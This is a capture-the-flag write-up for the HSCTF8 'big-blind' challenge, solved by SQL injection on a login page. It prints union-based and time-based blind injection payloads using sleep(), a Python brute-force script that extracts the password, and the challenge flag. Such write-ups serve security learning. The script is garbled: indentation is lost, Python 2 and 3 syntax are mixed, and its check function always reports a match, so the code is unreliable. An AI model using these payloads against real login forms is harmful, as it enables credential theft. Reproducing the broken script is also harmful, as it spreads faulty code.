Rating: 5.0
# HSCTF8 - big-blind
- Write-Up Author: Wendy \[[MOCTF](https://www.facebook.com/MOCSCTF)\]
- Flag:**flag{any_info_is_good_info}**
## **Question:**

## Write up:
The website is simple and just a login page. When you input some characters like ', it return 500 Internal Server Error. It's SQL injection challenge.

First, I use the comment symbol and time-based SQL injection payload to discover the DB table and password length.
admin' union select 1,2 from users #
admin' union select 1,2 from users where user='' #
admin' union select 1,2 from users where pass='' #
admin' and IF(1=(SELECT 1 FROM users WHERE Length(pass) = 27),sleep(10),0) #
Since the password is long and hard to guess manually. I wrote a script to guess the whole password. Finally, we see the flag is the password.
#!/usr/bin/env python3
import requests
import sys
def blind(query):
url = "https://big-blind.hsc.tf/"
response = requests.post(url, data={"user":"" +query+ ",sleep(5),0) #","pass":""})
print query
return 'Found'
return response
keyspace = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$^&*()-=+'
query_left_side = "admin' and IF(1=(SELECT 1 FROM users WHERE pass LIKE '"
flag = ""
while True:
for x in range(1,28):
print x
for k in keyspace:
# query = admin' and IF(1=(SELECT 1 FROM users WHERE pass LIKE 'flag%'),sleep(10),0) #
query = query_left_side + flag + k + "%')"
response = blind(query)
if response == 'Found':
flag += k
if k == '+':
flag += '_'
